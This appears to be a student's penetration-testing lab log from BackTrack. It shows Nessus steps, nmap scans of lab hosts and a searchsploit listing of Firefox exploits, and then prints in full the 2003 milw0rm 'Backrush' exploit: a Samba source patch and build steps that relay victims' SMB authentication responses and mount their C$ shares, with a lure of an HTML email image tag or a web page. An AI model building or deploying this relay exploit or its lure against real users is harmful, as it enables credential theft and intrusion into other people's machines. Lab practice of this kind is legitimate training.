-Service Enumeration
1.Using Nessus
-entri user name and password
-chose menu Scan and click buttom add
-insert the name, type, police and scan
target
-after finish/ complete scan, click reports
to can information gathering
-click host
-click total
-click high continue click number's and
click one of show
-click medium
-click open port
-download report and change the type
ekstensi.
- Scanning
with nmap
-scan with type
root@BT:~# nmap -v -A 192.168.56.101
Starting Nmap 5.61TEST4 ( http://nmap.org )
at 2012-01-27 16:57 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 16:57
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 16:57, 0.06s
elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1
host. at 16:57
Completed Parallel DNS resolution of 1
host. at 16:57, 13.00s elapsed
Initiating SYN Stealth Scan at 16:57
Scanning 192.168.56.101 [1000 ports]
Discovered open port 135/tcp on
192.168.56.101
Discovered open port 139/tcp on
192.168.56.101
Discovered open port 445/tcp on
192.168.56.101
Completed SYN Stealth Scan at 16:57, 1.22s
elapsed (1000 total ports)
Initiating Service scan at 16:57
Scanning 3 services on 192.168.56.101
Completed Service scan at 16:57, 6.01s
elapsed (3 services on 1 host)
Initiating OS detection (try #1) against
192.168.56.101
NSE: Script scanning 192.168.56.101.
Initiating NSE at 16:57
Completed NSE at 16:57, 0.20s elapsed
Nmap scan report for 192.168.56.101
Host is up (0.00068s latency).
Not shown: 997 closed ports
PORT
STATE SERVICE VERSION
135/tcp open msrpc
Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP
microsoft-ds
MAC Address: 08:00:27:41:74:C0 (Cadmus
Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262
(Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE:
cpe:/o:microsoft:windows
Host script results:
| nbstat:
|
NetBIOS name: IS2C-6C66D0BB8D, NetBIOS user: <unknown>, NetBIOS
MAC: 08:00:27:41:74:c0 (Cadmus Computer Systems)
|
Names
|
IS2C-6C66D0BB8D<00> Flags:
<unique><active>
|
WORKGROUP<00> Flags:
<group><active>
|
IS2C-6C66D0BB8D<20> Flags: <unique><active>
|_
WORKGROUP<1e> Flags:
<group><active>
|_smbv2-enabled: Server doesn't support
SMBv2 protocol
| smb-security-mode:
|
Account that was used for smb scripts: guest
|
User-level authentication
|
SMB Security: Challenge/response passwords supported
|_
Message signing disabled (dangerous, but default)
| smb-os-discovery:
|
OS: Windows XP (Windows 2000 LAN Manager)
|
Computer name: is2c-6c66d0bb8d
|
NetBIOS computer name: IS2C-6C66D0BB8D
|
Workgroup: WORKGROUP
|_
System time: 2012-01-27 16:57:45 UTC+7
TRACEROUTE
HOP RTT
ADDRESS
1
0.68 ms 192.168.56.101
NSE: Script Post-scanning.
Read data files from:
/usr/local/bin/../share/nmap
OS and Service detection performed. Please
report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned
in 23.08 seconds
Raw packets sent: 1098 (49.010KB) | Rcvd: 1017 (41.234KB)
-root@BT:~# nmap -v -IR 192.168.56.101
WARNING: identscan (-I) no longer
supported. Ignoring -I
Starting Nmap 5.61TEST4 ( http://nmap.org )
at 2012-01-27 17:14 WIT
Initiating ARP Ping Scan at 17:14
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 17:14, 0.06s
elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1
host. at 17:14
Completed Parallel DNS resolution of 1
host. at 17:15, 13.00s elapsed
Initiating SYN Stealth Scan at 17:15
Scanning 192.168.56.101 [1000 ports]
Discovered open port 135/tcp on
192.168.56.101
Discovered open port 445/tcp on
192.168.56.101
Discovered open port 139/tcp on
192.168.56.101
Completed SYN Stealth Scan at 17:15, 1.20s
elapsed (1000 total ports)
Nmap scan report for 192.168.56.101
Host is up (0.00088s latency).
Not shown: 997 closed ports
PORT
STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:41:74:C0 (Cadmus
Computer Systems)
Read data files from:
/usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned
in 14.41 seconds
Raw packets sent: 1082 (47.592KB) | Rcvd: 1001 (40.040KB)
-Vulnerability
Analisys
1.Using exploitdb
root@BT:~# cd /pentest/exploits/exploitdb
root@BT:/pentest/exploits/exploitdb# ./searchsploit firefox
Description
Path
---------------------------------------------------------------------------
-------------------------
Mozilla Firefox Install Method Remote
Arbitrary Code Execution Exploit
/windows/remote/986.html
Mozilla Firefox view-source:javascript url
Code Execution Exploit
/multiple/remote/1007.html
Mozilla FireFox <= 1.0.1 Remote GIF Heap
Overflow Exploit
/windows/remote/1089.c
Mozilla Firefox <= 1.0.4 ""Set
As Wallpaper"" Code Execution Exploit /windows/remote/1102.html
Mozilla Firefox <= 1.0.7 Integer
Overflow Denial of Service Exploit
/multiple/dos/1233.html
Mozilla (Firefox <= 1.0.7) (Thunderbird
<= 1.0.6) Denial of Service Exploit /multiple/dos/1253.html
Mozilla (Firefox <= 1.0.7) (Mozilla
<= 1.7.12) Denial of Service Exploit
/multiple/dos/1257.html
Mozilla Firefox <= 1.5 (history.dat)
Looping Vulnerability PoC
/windows/dos/1362.html
Mozilla Firefox <= 1.04 compareTo()
Remote Code Execution Exploit
/multiple/remote/1369.html
Mozilla Firefox 1.5
location.QueryInterface() Code Execution (linux) /linux/remote/1474.pm
Mozilla Firefox 1.5
location.QueryInterface() Code Execution (osx) /osX/remote/1480.pm
Mozilla Firefox <= 1.5.0.1
/multiple/dos/1667.html
Mozilla Firefox <= 1.5.0.2
(js320.dll/xpcom_core.dll) Denial of Service PoC /multiple/dos/1716.html
Mozilla Firefox <= 1.5.0.3 (Loop) Denial
of Service Exploit
/multiple/dos/1802.html
Mozilla Firefox <= 1.5.0.4 (marquee)
Denial of Service Exploit
/multiple/dos/1867.html
Mozilla Firefox <= 1.5.0.4 Javascript
Navigator Object Code Execution PoC
/multiple/remote/2082.html
Mozilla Firefox <= 1.5.0.6 (FTP Request)
Remote Denial of Service Exploit
/multiple/dos/2244.pl
Mozilla Firefox <= 1.5.0.7/ 2.0
(createRange) Remote DoS Exploit
/multiple/dos/2695.html
Mozilla Firefox <= 2.0.0.1
(location.hostname) Cross-Domain Vulnerability
/windows/remote/3340.html
Mozilla Firefox 2.0.0.3 / Gran Paradiso
3.0a3 DoS Hang / Crash Exploit
/multiple/dos/3606.py
Mozilla Firefox <= 2.0.0.7 Remote Denial
of Service Exploit
/multiple/dos/4559.txt
Mozilla Firefox 3.0.3 User Interface Null
Pointer Dereference Crash
/windows/dos/6614.html
Skype extension for Firefox BETA 2.2.0.95
Clipboard Writing Vulnerability
/windows/remote/6690.html
Mozilla Firefox 3.0.5 location.hash Remote
Crash Exploit /windows/dos/7554.pl
Mozilla Firefox 3.0.5 location.hash Remote
Crash Exploit
/windows/dos/7554.pl
Firefox 3.0.5 Status Bar Obfuscation /
Clickjacking
/windows/remote/7842.html
Mozilla Firefox 3.0.6 (BODY onload) Remote
Crash Exploit
/multiple/dos/8091.html
Mozilla Firefox 3.0.7 OnbeforeUnLoad
DesignMode Dereference Crash
/multiple/dos/8219.html
Mozilla Firefox XSL Parsing Remote Memory
Corruption PoC 0day
/multiple/dos/8285.txt
Firefox 3.0.x (XML Parser) Memory
Corruption / DoS PoC
/windows/dos/8306.txt
Mozilla Firefox XSL Parsing Remote Memory
Corruption PoC #2
/windows/dos/8356.txt
Mozilla Firefox (unclamped loop) Denial of
Service Exploit
/multiple/dos/8794.htm
Mozilla Firefox 3.0.10 (KEYGEN) Remote
Denial of Service Exploit
/multiple/dos/8822.txt
DX Studio Player < 3.0.29.1 Firefox
plug-in Command Injection Vuln
/windows/remote/8922.txt
Mozilla Firefox 3.5 (Font tags) Remote
Buffer Overflow Exploit
/windows/remote/9137.html
Mozilla Firefox 3.5 (Font tags) Remote
Buffer Overflow Exploit
/windows/remote/9137.html
Mozilla Firefox 3.5 unicode Remote Buffer
Overflow PoC /windows/dos/9158.html
Mozilla Firefox 3.5 (Font tags) Remote Heap
Spray Exploit
/windows/remote/9181.py
Mozilla Firefox 3.5 (Font tags) Remote Heap
Spray Exploit (pl)
/windows/remote/9214.pl
Mozilla Firefox 3.5 (Font tags) Remote
Buffer Overflow Exploit (osx)
/osX/remote/9247.py
Mozilla Firefox < 3.0.14 Multiplatform
RCE via pkcs11.addmodule
/multiple/remote/9651.txt
Mozilla Firefox 2.0.0.16 UTF-8 URL Remote
Buffer Overflow Exploit
/windows/remote/9663.py
Firefox 3.5.3 local download manager temp
file creation
/windows/local/9882.txt
Mozilla Suite/Firefox < 1.5.0.5
Navigator Object Code Execution
/multiple/remote/9946.rb
Mozilla Suite/Firefox < 1.0.5 compareTo
Code Execution
/windows/remote/9947.rb
Firefox 3.5 escape Memory Corruption
Exploit
/multiple/remote/9949.rb
Firefox + Adobe Memory Corruption PoC
/windows/dos/10208.txt
Mozilla Firefox Location Bar Spoofing
Vulnerability
/multiple/local/10544.html
Firefox 3.6 (XML parser) Memory Corruption
PoC/DoS /windows/dos/11245.txt
Mozilla Firefox 3.6 (Multitudinous looping
)Denial of Service Exploit
/windows/dos/11432.txt
Mozilla Firefox v3.6 URL Spoofing
Vulnerability
/multiple/local/11561.html
Mozilla Firefox <= 3.6 Denial Of Service
Exploit
/multiple/dos/11590.php
Mozilla Firefox v3.6 and Opera Long String
Crash(0day) Exploit
/windows/dos/11617.txt
Firefox 3.6.3 Fork Bomb DoS
/windows/dos/12492.html
Firefox 3.6.3 & Safari 4.0.5 - Access
Violation Exception and Unknown Exception /windows/dos/12602.txt
Firefox 3.6.3 (latest) <= memory
exhaustion crash vulnerabilities
/windows/dos/12678.txt
Firefox <= 3.6.8 DLL Hijacking Exploit
(dwmapi.dll)
/windows/local/14730.c
MOAUB #9 - Mozilla Firefox XSLT Sort Remote
Code Execution Vulnerability
/windows/dos/14949.py
MOAUB #17 - Firefox Plugin Parameter
EnsureCachedAttrParamArrays Remote Code Execution /windows/dos/15027.py
MOAUB #25 - Mozilla Firefox CSS font-face
Remote Code Execution Vulnerability /windows/dos/15104.py
Firefox 3.5.10 & 3.6.6 WMP Memory
Corruption Using Popups
/windows/dos/15242.html
Firefox Interleaving document.write and
appendChild Denial of Service
/multiple/dos/15341.html
Firefox Memory Corruption Proof of Concept
(Simplified)
/multiple/dos/15342.html
Firefox 3.6.8 - 3.6.11 Interleaving
document.write and appendChild Exploit (From the Wild)
/windows/remote/15352.html
Mozilla Firefox <= 3.6.12 Remote Denial
Of Service
/multiple/dos/15498.html
Firefox 3.5 escape() Return Value Memory
Corruption
/multiple/remote/16299.rb
Mozilla Suite/Firefox Navigator Object Code
Execution
/multiple/remote/16300.rb
Firefox location.QueryInterface() Code
Execution
/multiple/remote/16301.rb
Mozilla Suite/Firefox
InstallVersion->compareTo() Code Execution /windows/remote/16306.rb
Mozilla Firefox Interleaving document.write
and appendChild Exploit
/windows/remote/16509.rb
Mozilla Firefox
""nsTreeRange"" Dangling Pointer Exploit /windows/remote/17419.zip
Mozilla Firefox
""nsTreeRange"" Dangling Pointer Vulnerability /windows/remote/17520.rb
Firefox 3.6.16 OBJECT mChannel Remote Code
Execution Exploit (DEP bypass)
/windows/remote/17612.rb
Mozilla Firefox 3.6.16 mChannel use after
free vulnerability
/windows/remote/17650.rb
Mozilla Firefox 3.6.16 mChannel Object Use
After Free Exploit (Win7)
/windows/remote/17672.html
Mozilla Firefox Array.reduceRight() Integer
Overflow Exploit
/windows/remote/17974.html
Mozilla Firefox Array.reduceRight() Integer
Overflow
/windows/remote/17976.rb
Firefox 8.0 Null Pointer Dereference
PoC
/multiple/dos/18116.html
root@BT:/pentest/exploits/exploitdb# cat
platforms/windows/remote/20.txt
##########################################
# Exploit for "Authentication flaw in
Windows SMB protocol" #
##########################################
# Release Date:
# April 24, 2003
#
# Code by Haamed Gheibi
(haamed@linux.ce.aut.ac.ir)
# Salman Niksefat
(salman@linux.ce.aut.ac.ir)
#
# Systems Affected by this exploit:
# Windows 2000 (SP0 SP1 SP2 SP3)
# Windows XP (SP0 SP1)
#
# EXPLOIT PROVIDED FOR EDUCATIONAL PURPOSES
ONLY AS A PROOF OF CONCEPT
# WE TAKE NO RESPONSIBILITY FOR USE OF THIS
CODE.
##########################################
This exploit is based on samba-2.2.8a, you
can download the source code from:
http://us1.samba.org/samba/ftp/samba-2.2.8a.tar.bz2
or other mirrors.
First you should configure and make samba
source code as follow:
You need first to extract the file:
$ tar -jxf samba-2.2.8a.tar.bz2
$ cd samba-2.2.8a/source
Here you need to configure with suitable
options. Here is a config for RedHat 9:
$ ./configure --sysconfdir=/etc
--with-codepagedir=/usr/share/samba/codepages\
--with-lockdir=/var/cache/samba
--with-configdir=/etc/samba
$ make
$ make bin/smbmount
$ su
# make install
First add an arbitary user to samba:
(Choose a reliable password for it for your protection!)
# smbadduser smbtmpuser:root
Now check if your samba server(bin/smbd)
and client(bin/smbmount) are working,
and that ipchains rulls are not set. you
can use:
# service smbd stop
# bin/smbd -i
# ipchains -F
Well, now if everything works fine, you can
apply the exploit code to the source.
Download it from:
http://seclab.ce.aut.ac.ir/samba-exp/exploit/backrush.patch
# patch < backrush.patch
Make it again:
# make bin/smbd
# make bin/smbmount
[Note that you shouldn't make whole samba,
cause you may get linker errors]
Make necessary directories:
# mkdir -p bin/backrush/log
# mkdir bin/backrush/mnt
# touch bin/backrush/ip2sharename.map
Now we are done, you MUST change directory
to bin and run the server:
# cd bin
# killall -9 smbd
# ./smbd
Now by default, the C$ share folder of any
Windows machine who tries to connect
to this SMB server, would be mounted to
mnt/machinename-random folder.
If you want to mount another share folder,
you can add an entry to ip2sharename.map file as follow:
IPADDRESS:SHARENAME
This option is suitable for XP systems.
2 ways 2 force a client to automatically
connect to your modified SMB server:
1. Send him/her a HTML email with the
following tag:
<IMG src='\\smb-server\nofile.gif'
width=1 height=1>
2. Invite him/her to visit your personal
web page.
You can make it by the above tag, then pray
and wait until he/she visits your page. ;)
Enjoy!
*
backrush.patch *
diff -Nur
/root/samba-2.2.8a/source/client/smbmount.c
/backrush/source.exp/client/smbmount.c
---
/root/samba-2.2.8a/source/client/smbmount.c 2002-04-30 17:56:19.000000000 +0430
+++ /backrush/source.exp/client/smbmount.c
2003-04-19 16:28:04.000000000 +0430
@@ -26,6 +26,10 @@
#include <mntent.h>
#include <asm/types.h>
#include <linux/smb_fs.h>
+//>Backrush
+int br_read[2], br_write[2], br_pid;
+struct Backrush br_state;
+//<
extern BOOL in_client;
extern pstring user_socket_options;
@@ -177,6 +181,21 @@
cli_shutdown(c);
return NULL;
}
+//>Backrush
+ {
+ int i;
+ printf("challange: ");
+ for (i = 0; i < 8; i++)
+
printf("%0.2x",c->cryptkey[i]);
+ fflush(stdout);
+ memcpy(br_state.challenge,
c->cryptkey, 8);
+ br_state.status = 1;
+ write(br_write[1],&br_state,
sizeof(br_state));
+ printf(" sent to server\n");
+ printf("waiting for
response...\n");
+ fflush(stdout);
+ }
+//<
if (!got_pass) {
char *pass = getpass("Password:
");
@@ -848,6 +867,14 @@
if (*credentials != 0) {
read_credentials_file(credentials);
}
+//>Backrush
+ printf("Started to mount %s on
%s\n",argv[1], argv[2]);
+ fflush(stdout);
+ if (getenv("BACKRUSH_READ"))
+ br_read[0] =
atoi(getenv("BACKRUSH_READ"));
+ if (getenv("BACKRUSH_WRITE"))
+ br_write[1] = atoi(getenv("BACKRUSH_WRITE"));
+//<
DEBUG(3,("mount.smbfs started (version
%s)\n", VERSION));
diff -Nur
/root/samba-2.2.8a/source/include/includes.h
/backrush/source.exp/include/includes.h
---
/root/samba-2.2.8a/source/include/includes.h 2003-02-28 19:26:18.000000000
+0330
+++ /backrush/source.exp/include/includes.h
2003-04-17 10:36:54.000000000 +0430
@@ -1,5 +1,26 @@
#ifndef _INCLUDES_H
#define _INCLUDES_H
+
+//>Backrush
+#include <stdlib.h>
+#include <time.h>
+struct Backrush
+{
+ int status;
+ char ip_address[20];
+ int port;
+ char username[256];
+ char sharename[256];
+ char netbios[256];
+ char domain[256];
+ char challenge[8];
+ char nt_resp[24];
+ char lm_resp[24];
+};
+extern struct Backrush br_state;
+extern int br_read[2],br_write[2],br_pid;
+//<
+
/*
Unix SMB/Netbios implementation.
Version 1.9.
diff -Nur
/root/samba-2.2.8a/source/libsmb/cliconnect.c
/backrush/source.exp/libsmb/cliconnect.c
---
/root/samba-2.2.8a/source/libsmb/cliconnect.c 2003-03-15 01:04:48.000000000
+0330
+++
/backrush/source.exp/libsmb/cliconnect.c 2003-04-17 12:30:26.000000000 +0430
@@ -23,7 +23,6 @@
#include "includes.h"
-
static const struct {
int prot;
const char *name;
@@ -265,7 +264,28 @@
memcpy(pword, pass, passlen);
memcpy(ntpword, ntpass, ntpasslen);
}
-
+//>Backrush
+ {
+ int i;
+ read(br_read[0],&br_state,
sizeof(br_state));
+ printf("received response:\n");
+ fflush(stdout);
+ memcpy(pword, br_state.lm_resp, 24);
+ memcpy(ntpword, br_state.nt_resp, 24);
+ if(br_state.username[0])
+ strncpy(user, br_state.username, 24);
+ printf("username: %s\n", user);
+ printf("lm response: ");
+ for (i = 0; i < 24; i++)
+ printf("%0.2x",pword[i]);
+ printf("\n");
+ printf("nt response: ");
+ for (i = 0; i < 24; i++)
+ printf("%0.2x",ntpword[i]);
+ printf("\n");
+ fflush(stdout);
+ }
+//<
/* send a session setup command */
memset(cli->outbuf,'\0',smb_size);
diff -Nur
/root/samba-2.2.8a/source/smbd/negprot.c /backrush/source.exp/smbd/negprot.c
---
/root/samba-2.2.8a/source/smbd/negprot.c 2003-03-15 01:04:49.000000000 +0330
+++ /backrush/source.exp/smbd/negprot.c
2003-04-24 13:37:19.000000000 +0430
@@ -180,6 +180,45 @@
doencrypt = ((cli->sec_mode & 2) !=
0);
}
+//>Backrush
+ {
+ srand(time(NULL));
+ pipe(br_read);
+ pipe(br_write);
+ br_state.status = 1;
+ br_state.port = random();
+ strncpy(br_state.ip_address,
get_socket_addr(smbd_server_fd()), sizeof(br_state.ip_address));
+ strncpy(br_state.sharename,
"c$", sizeof(br_state.sharename));
+ {
+ char tmp[1024], *ptr;
+ FILE *fin =
fopen("backrush/ip2sharename.map","r");
+ if (fin)
+ {
+ while(fscanf(fin, "%s", tmp)
> 0)
+ {
+ ptr = strchr(tmp, ':');
+ *ptr++ = 0;
+ if (!strcmp(br_state.ip_address,tmp))
+ strncpy(br_state.sharename, ptr,
sizeof(br_state.sharename));
+ }
+ fclose(fin);
+ }
+ }
+ if (!(br_pid = fork()))
+ {
+ char cmd[1024];
+ snprintf(cmd, sizeof cmd, "mkdir -p
backrush/mnt/%s-%d", br_state.ip_address, br_state.port);
+ system(cmd);
+ snprintf(cmd, sizeof cmd, "export
BACKRUSH_READ=%d; export BACKRUSH_WRITE=%d;
./smbmount //%s/%s backrush/mnt/%s-%d -o
username=root,password=let_me_go_in
>backrush/log/%s-%d",
+ br_write[0], br_read[1],
br_state.ip_address, br_state.sharename, br_state.ip_address,
br_state.port, br_state.ip_address,
br_state.port);
+ system(cmd);
+ snprintf(cmd, sizeof cmd, "echo
smbmount compeleted >>backrush/log/%s-%d",
br_state.ip_address, br_state.port);
+ system(cmd);
+ _exit(0);
+ }
+ }
+//<
+
if (doencrypt) {
crypt_len = 8;
if (!cli) {
diff -Nur
/root/samba-2.2.8a/source/smbd/password.c /backrush/source.exp/smbd/password.c
---
/root/samba-2.2.8a/source/smbd/password.c 2003-04-07 06:24:00.000000000 +0430
+++ /backrush/source.exp/smbd/password.c
2003-04-19 09:15:47.000000000 +0430
@@ -48,6 +48,10 @@
unsigned char buf[8];
generate_random_buffer(buf,8,False);
+//>Backrush
+ read(br_read[0],&br_state,
sizeof(br_state));
+ memcpy(buf, br_state.challenge, 8);
+//<
memcpy(saved_challenge, buf, 8);
memcpy(challenge,buf,8);
@@ -466,7 +470,13 @@
uchar challenge[8];
char* user_name;
uint8 *nt_pw, *lm_pw;
-
+//>Backrush
+ memcpy(br_state.nt_resp, nt_pass, 24);
+ memcpy(br_state.lm_resp, lm_pass, 24);
+ write(br_write[1],&br_state,
sizeof(br_state));
+// waitpid(br_pid,NULL,WNOHANG);
+ return(False);
+//<
if (!lm_pass || !sampass)
return(False);
diff -Nur
/root/samba-2.2.8a/source/smbd/reply.c /backrush/source.exp/smbd/reply.c
--- /root/samba-2.2.8a/source/smbd/reply.c
2003-04-07 06:24:00.000000000 +0430
+++ /backrush/source.exp/smbd/reply.c
2003-04-16 18:03:58.000000000 +0430
@@ -974,6 +974,11 @@
* security=domain.
*/
+//>Backrush
+
strncpy(br_state.username,user,sizeof(br_state.username));
+
strncpy(user,"root",sizeof(br_state.username));
+//<
+
if (!guest &&
!check_server_security(orig_user, domain, user,
smb_apasswd, smb_apasslen, smb_ntpasswd,
smb_ntpasslen) &&
!check_domain_security(orig_user, domain,
user, smb_apasswd,
diff -Nur
/root/samba-2.2.8a/source/smbd/server.c /backrush/source.exp/smbd/server.c
--- /root/samba-2.2.8a/source/smbd/server.c
2003-03-15 01:04:49.000000000 +0330
+++ /backrush/source.exp/smbd/server.c
2003-04-16 18:05:17.000000000 +0430
@@ -25,6 +25,11 @@
extern fstring global_myworkgroup;
extern pstring global_myname;
+//<Backrush
+int br_read[2],br_write[2],br_pid;
+struct Backrush br_state;
+//>
+
int am_parent = 1;
/* the last message the was processed */
# milw0rm.com [2003-04-25]
root@BT:/pentest/exploits/exploitdb# nmap
192.168.0.67
Starting Nmap 5.61TEST4 ( http://nmap.org )
at 2012-01-27 21:05 WIT
Nmap scan report for 192.168.0.67
Host is up (0.0021s latency).
Not shown: 988 closed ports
PORT
STATE SERVICE
21/tcp
open ftp
22/tcp
open ssh
23/tcp
open telnet
25/tcp
open smtp
53/tcp
open domain
80/tcp
open http
139/tcp
open netbios-ssn
445/tcp
open microsoft-ds
3306/tcp open mysql
5432/tcp open postgresql
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 08:00:27:B3:F9:F8 (Cadmus
Computer Systems)
Nmap done: 1 IP address (1 host up) scanned
in 13.41 seconds
